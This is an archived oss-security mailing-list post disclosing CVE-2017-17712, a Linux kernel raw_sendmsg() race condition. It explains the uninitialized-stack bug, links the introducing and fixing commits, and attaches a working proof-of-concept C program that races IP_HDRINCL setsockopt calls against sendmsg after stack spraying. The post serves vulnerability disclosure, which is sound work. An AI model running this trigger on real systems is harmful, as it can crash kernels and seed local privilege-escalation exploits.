[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] CVE-2017-17712 net/ipv4/raw.c: raw_sendmsg() race condition
From: Mohamed Ghannam <simo.ghannam () gmail ! com>
Date: 2017-12-16 0:29:09
Message-ID: CAP8jf_BKWuYGsqrNUCbJgCFUJv0nJvp+eiKEy3Ati0FYaCED0Q () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Hi,
This is an announcement for CVE-2017-17712 which is a race condition leads
to uninitialized stack variable, this might be used to gain code execution.
The bug was introduced here :
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c008ba5bdc9fa830e1a349b20b0be5a137bdef7a
And fixed here :
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8f659a03a0ba9289b9aeb9b4470e6fb263d6f483
####### BUG DETAILS ############
in net/ipv4/raw.c:
static int raw_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
{
...
struct raw_frag_vec rfv; [1]
...
...
if (!inet->hdrincl) { [2]
rfv.msg = msg;
rfv.hlen = 0;
err = raw_probe_proto_opt(&rfv, &fl4);
if (err)
goto done;
}
...
...
if (inet->hdrincl) [3]
err = raw_send_hdrinc(sk, &fl4, msg, len,
&rt, msg->msg_flags, &ipc.sockc);
else {
sock_tx_timestamp(sk, ipc.sockc.tsflags, &ipc.tx_flags);
if (!ipc.addr)
ipc.addr = fl4.daddr;
lock_sock(sk);
err = ip_append_data(sk, &fl4, raw_getfrag,
&rfv, len, 0, [4]
&ipc, &rt, msg->msg_flags);
...
}
[1] rfv is not initialized and contains a pointer to a msghdr header
structure.
[2], [3] There are multiple checks against inet->hdrincl without a lock.
When we achieve (by racing inet->hdrincl via setsockopt()) inet->hdrincl=1
in [1], and inet->hdrincl=0 in [2], rfv variable remains uninitialized and
used in [4].
By spraying the stack with controlled user data , we can take control of
msg pointer which is used later in ip_append_data().
In attachment : poc.c + kernel panic log
####### CREDITS ############
Mohamed GHANNAM
[Attachment #5 (text/html)]
<div dir="ltr">
<p class="gmail-p1" style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-varia \
nt-caps:normal;font-weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">Hi,</p><p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><br></p><p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">This is an announcement for CVE-2017-17712 which is a race \
condition leads to uninitialized stack variable, <span \
style="font-size:12.8px;font-family:arial,sans-serif;color:rgb(34,34,34)">this might be used to \
gain code execution.</span></p> <p class="gmail-p2" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p3" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(228,175,10)"><span class="gmail-s1" style="color:rgb(69,69,69)">The bug \
was introduced here : <a \
href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c008ba5bdc9fa830e1a349b20b0be5a137bdef7a"><span \
class="gmail-s2" style="text-decoration:underline;color:rgb(228,175,10)">https://git.kernel.org/ \
pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c008ba5bdc9fa830e1a349b20b0be5a137bdef7a</span></a></span></p>
<p class="gmail-p3" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(228,175,10)"><span class="gmail-s1" style="color:rgb(69,69,69)">And fixed \
here : <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8f659a03a0ba9289b9aeb9b4470e6fb263d6f483"><span \
class="gmail-s3" style="color:rgb(228,175,10)">https://git.kernel.org/pub/scm/linux/kernel/git/t \
orvalds/linux.git/commit/?id=8f659a03a0ba9289b9aeb9b4470e6fb263d6f483</span></a></span></p> <p \
class="gmail-p2" style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant- \
caps:normal;font-weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">####### <span class="gmail-Apple-converted-space"> </span>BUG \
DETAILS<span class="gmail-Apple-converted-space"> </span>############</p> <p class="gmail-p2" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">in net/ipv4/raw.c:</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">static int raw_sendmsg(struct sock *sk, struct msghdr *msg, \
size_t len)</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">{</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>...</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>struct raw_frag_vec rfv; <span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>[1]</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>...</p> <p class="gmail-p2" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>...</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>if (!inet->hdrincl) { <span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>[2]</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>rfv.msg = msg;</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>rfv.hlen = 0;</p> <p class="gmail-p2" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>err = raw_probe_proto_opt(&rfv, &fl4);</p> <p \
class="gmail-p1" style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant- \
caps:normal;font-weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>if (err)</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>goto done;</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>}</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>...</p> <p class="gmail-p2" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>...</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>if (inet->hdrincl) <span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>[3]</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>err = raw_send_hdrinc(sk, &fl4, msg, len,</p> <p \
class="gmail-p1" style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant- \
caps:normal;font-weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span> &rt, msg->msg_flags, &ipc.sockc);</p> <p \
class="gmail-p2" style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant- \
caps:normal;font-weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span> else {</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>sock_tx_timestamp(sk, ipc.sockc.tsflags, \
&ipc.tx_flags);</p> <p class="gmail-p2" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>if (!ipc.addr)</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>ipc.addr = fl4.daddr;</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>lock_sock(sk);</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>err = ip_append_data(sk, &fl4, raw_getfrag,</p> <p \
class="gmail-p1" style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant- \
caps:normal;font-weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span> &rfv, len, 0,<span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span>[4]</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)"><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
style="white-space:pre"> </span><span class="gmail-Apple-tab-span" \
<p class="gmail-p1" style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-varia \
nt-caps:normal;font-weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">}</p> <p class="gmail-p2" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">[1] rfv is not initialized and contains a pointer to a msghdr \
header structure.</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">[2], [3] There are multiple checks against inet->hdrincl \
without a lock.</p> <p class="gmail-p2" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">When we achieve (by racing inet->hdrincl via setsockopt()) \
inet->hdrincl=1 in [1], and inet->hdrincl=0 in [2], rfv variable remains uninitialized \
and used in [4].</p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">By spraying the stack with controlled user data , we can take \
control of msg pointer which is used later in ip_append_data().</p> <p class="gmail-p2" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">In attachment : poc.c + kernel panic log</p> <p \
class="gmail-p2" style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant- \
caps:normal;font-weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69);min-height:14px"><br></p> <p class="gmail-p1" \
style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font- \
weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">####### <span class="gmail-Apple-converted-space"> \
</span>CREDITS<span class="gmail-Apple-converted-space"> </span>############</p> <p \
class="gmail-p1" style="margin:0px;font-style:normal;font-variant-ligatures:normal;font-variant- \
caps:normal;font-weight:normal;font-stretch:normal;font-size:12px;line-height:normal;font-family:"Helvetica \
Neue";color:rgb(69,69,69)">Mohamed GHANNAM</p></div>
--001a11482b1cb7a17d05606a34dd--
["panic.log" (application/octet-stream)]
["poc.c" (text/x-csrc)]
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <pthread.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <poll.h>
#define CHKERR(cond,msg) if((cond)) { \
perror((msg)); \
}
#define PSIZE 100
#define TIDSIZE 10000
pthread_t tid1[TIDSIZE];
pthread_t tid2[TIDSIZE];
int val0 = 0;
struct msghdr *msg = NULL;
struct sockaddr_in sin= {.sin_port = 0};
struct iovec iov[256];
int i;
unsigned char buf[PSIZE];
char payload[2048];
int fdsock;
void create_ns(void)
{
if(unshare(CLONE_NEWUSER) != 0) {
perror("unshare(CLONE_NEWUSER)");
exit(1);
}
if(unshare(CLONE_NEWNET) != 0) {
perror("unshared(CLONE_NEWUSER)");
exit(2);
}
}
void *do_setsockopt_hdrincl(void *arg)
{
int err,val;
val = *(int*)arg;
err = setsockopt(fdsock,SOL_IP,IP_HDRINCL,&val,4);
CHKERR(err,"setsockopt_int");
return NULL;
}
void do_poll(void)
{
poll((struct pollfd*)payload,256,0);
}
int create_socket(void)
{
int fd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
CHKERR(fd < 0,"socket");
return fd;
}
struct msghdr *prepare_sendmsg(void)
{
struct msghdr *msg;
int off = 156;
memset(buf,0xcc,PSIZE);
memset(payload,0x00,2048);
memset(payload+off , 0x11,8);
for(i=0;i<256;i++) {
iov[i].iov_base = buf;
iov[i].iov_len = PSIZE;
}
msg = malloc(sizeof(struct msghdr));
if(!msg) {
perror("malloc");
exit(-1);
}
memset(msg,0,sizeof(struct msghdr));
memset(&sin,0,sizeof(sin));
msg->msg_name = &sin;
msg->msg_namelen = sizeof(sin);
msg->msg_iov = iov;
msg->msg_iovlen = 256;
msg->msg_control = NULL;
msg->msg_controllen = 0;
msg->msg_flags = 0;
return msg;
}
void *do_sendmsg_for_race(void *arg)
{
int val = 1;
int fd = *(int*)arg;
setsockopt(fd,SOL_IP,IP_HDRINCL,&val,4);
do_poll();
sendmsg(fd,msg,0);
return NULL;
}
void racy(void)
{
int i;
for(i=0;i<TIDSIZE;i++) {
pthread_create(&tid1[i],NULL,do_setsockopt_hdrincl,(void*)&val0);
pthread_create(&tid2[i],NULL,do_sendmsg_for_race,(void*)&fdsock);
}
for(i=0;i<TIDSIZE;i++) {
pthread_join(tid1[i],NULL);
pthread_join(tid2[i],NULL);
}
}
int main(int argc,char **argv)
{
create_ns();
fdsock = create_socket();
msg = prepare_sendmsg();
racy();
return 0;
}
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic